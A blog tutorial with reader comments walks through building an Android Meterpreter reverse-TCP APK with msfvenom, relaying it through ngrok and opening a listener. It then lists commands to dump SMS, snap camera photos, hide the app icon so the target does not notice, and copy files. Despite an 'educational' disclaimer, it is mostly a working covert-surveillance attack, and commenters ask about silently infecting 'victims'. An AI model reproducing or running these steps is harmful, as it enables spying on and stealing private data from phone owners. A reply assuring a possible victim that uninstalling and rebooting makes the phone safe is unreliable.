Use Metasploit in Termux

Hey everyone, in this post, we're diving into how to test the security of Android phones using Termux and Metasploit. We want to show you how these tools can be used to see if your Android device is secure. We'll walk you through the steps, so you can try it out yourself. Just follow the commands we give you in the Termux app. This way, you'll get hands-on experience and learn more about keeping your mobile devices safe and sound.

Important Note: The content of this post is intended solely for educational purposes. Neither I nor this website endorse or condone any illegal activities. It's crucial to utilize the information provided here responsibly and within legal boundaries. We advocate for the responsible use of technology and emphasize the importance of ethical behavior in cybersecurity practices.

Requirements:

  1. Termux: If you wanna know about termux in Detail [What is termux? | Download termux]
  2. Metasploit: If you don't have Metasploit in your Termux Install Metasploit in termux ]


Port Forwarding using Ngrok in termux:

If you're planning to use Metasploit on a local network (LAN), feel free to skip this step. This step becomes necessary when you and your target are not on the same Wi-Fi network.

Port forwarding allows us to access the target device's phone using mobile data. This is particularly useful if you're using a SIM card. Therefore, port forwarding is essential to utilize Metasploit effectively in such scenarios.


Step 1:

Go to Ngrok.com and create an account. if you already have an account at ngrok then log in.

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 2:

Download the Ngrok zip file on your phone.It will be approx 12Mb file.

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 3:

Now you will see a zip file that you have downloaded from the Ngrok website.
Open termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder, just open the file manager and paste the zip file in your internal storage.and go to termux and cd storage.

How to hack android phone using Termux with Metasploit and Ngrok-2020





Step 4:
Type this command to copy the zip file in your Home directory of termux.
cp ngrok-stable-linux-arm.zip /$HOME
How to hack android phone using Termux with Metasploit and Ngrok-2020





Step 5:
Type this command to go back to your home directory.
cd /$HOME




Step 6:
Type this command to unzip the file.
unzip ngrok-stable-linux-arm.zip

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 7:

Go to Ngrok site again and copy the token,(please copy the full token)

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 8:

Open terminal and type this code and paste your token and press enter.
./ngrok authtoken 

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 9:

Type this command to start port forwarding on port 1275.
./ngrok tcp 1275
You can use any port number i am using 1275 here.

How to hack android phone using Termux with Metasploit and Ngrok-2020




Step 10:
If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.

How to hack android phone using Termux with Metasploit and Ngrok-2020





Create payload in Metasploit:

The payload will be an apk file which we are going to install on our second phone for testing the metasploit tool. That will allow us to Acess the second android phone.


Step 1:

Open a new session in termux (just swipe your screen from left to right and click on new session). please make sure the termux have storage permission. type below commands if you don't have the storage permission.
termux-setup-storage
Allow storage permission.








Step 2:
Type this command to create a payload and press Enter.

Please change your LHOST and LPORT as given in the below image.

How to hack android phone using Termux with Metasploit and Ngrok-2020
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
How to hack android phone using Termux with Metasploit and Ngrok-2020





 Step 3:
Go to your internal storage and you will see Android.apk.
Install this apk in the second phone.

How to hack android phone using Termux with Metasploit and Ngrok-2020





Start Listener (msfconsole): 

Step 1:

Type this command in termux windows to start the msfconsole.
msfconsole
It can take upto 30 sec to start.

Hack Android Phone Using Termux with Metasploit and Ngrok - 2020




Step 2:

Type this command to start the Multi handler in Metasploit.
use exploit/multi/handler

Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Step 3:
Type this command to set the payload.
set payload android/meterpreter/reverse_tcp 
Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Step 4:
Now set the LHOST at which you wanna listen to the session.
If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP.
set LHOST 127.0.0.1
Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Step 5:
Now set the LPORT.
if you are using Ngrok then set the same port which you used while port forwarding.
if you are not using port forwarding then just enter the same port you used to create the payload.
set LPORT 1275 
Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Step 6:
This is the last command and the phone will be Hacked.
exploit.
It will connect to the scond phone and give you meterpreter session.

Hack Android Phone Using Termux with Metasploit and Ngrok - 2020




Some useful commands in Meterpreter.

Find all the commands available:

This command will give you a list of commands and a short description of that command.
help 

Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Get SMS from the second phone to your phone:

This command will give you the most recent 50 SMS from the second phone.
dump_sms
You will get a text file that contains all the SMS with details just use cat command to open the file.

Hack Android Phone Using Termux with Metasploit and Ngrok - 2020





Hide the icon of the Apk you send to the second phone:

If you are installing an app on the targeted device, it's apparent that the user will likely notice the new app and may decide to uninstall it. To prevent detection, you can use the below command to hide the app icon from the targeted phone.
hide_app_icon



Change the audio mode:

you can set the phone on general mode by using the below command.
set_audio_mode -m 1
you can type set_audio_mode -m 0 to silent the phone.



Capture pictures:
This command will capture a photo from the second phone's camera and send it to your storage folder.
webcam_snap


 Access file storage:
You can navigate to the second phones file and see all the data in any folder.
cd /sdcard
you can type ls command to show directories if you wanna know about the basic commands of termux read this post.



Download any file:
navigate to the file you wanna download and type this command
download file-name

CONCLUSION:

Now that you have a meterpreter session, it indicates that you have gained access to the Testing phone. However, in some senarios if the targeted user deletes the app, you'll lose access to the phone. If you're interested in maintaining access even if the app is removed or if the phone is restarted, check out [ How to Hide app icon and create a persistent payload in Metasploit ]. Feel free to ask any questions in the comments. Thank you for reading, and remember to always prioritize ethical behavior. 👾

Post a Comment

47 Comments

  1. Hello if I close my terminal how do i get connected back to the device?

    ReplyDelete
  2. You just have to follow the steps below
    Start Listener (msfconsole):

    ReplyDelete
  3. will ngrok still connected if i close my terminal??

    ReplyDelete
  4. Is this possible to stay connected with victims mobile after disconnect ngrok

    ReplyDelete
  5. Its imp to install Metasploit first

    ReplyDelete
  6. Pratik More
    Can you do Instagram bruteforce from Termux?

    ReplyDelete
  7. Any auto install apk for victims

    ReplyDelete
    Replies
    1. he means can we install apk payload without their notice ?

      Delete
  8. That was awesome keep it up

    ReplyDelete
  9. how to hack not installing apk send a link to hack

    ReplyDelete
  10. Nice I will try it but I didn't get you when you said that I have to change LHOST and LPORT how do you change them

    ReplyDelete
  11. can we make apk with diffrent icon and name?

    ReplyDelete
  12. If I close all those is there anyway to reconnect with the victim

    ReplyDelete
  13. When I type CD downloads /then that come like this bash: cd: too many arguments
    help me up

    ReplyDelete
  14. Sir please make video on it it's not clear with this at all and I know this is working but it's actually hard plz help sir.

    ReplyDelete
  15. Plz help me my exploit is not working

    ReplyDelete
  16. How to navigate zip file in termux?

    ReplyDelete
  17. Meterpreter session 1 closed reason died bro help me

    ReplyDelete
  18. how do we install the app on the victim's phone?!, do we need to install it manually or we can install it by any command or by sending him/her the link?

    ReplyDelete
  19. Nice and simple tutorial....Thanks man...You are the best😅

    ReplyDelete
  20. Someone tried this on me i have unistalled the app form my phone.. is my phone safe now or should i reset it ?

    ReplyDelete
    Replies
    1. It's safe, just reboot your phone one time and done.

      Delete
  21. My ngrok don't have any Lport adress how can i get my Lport number....?

    ReplyDelete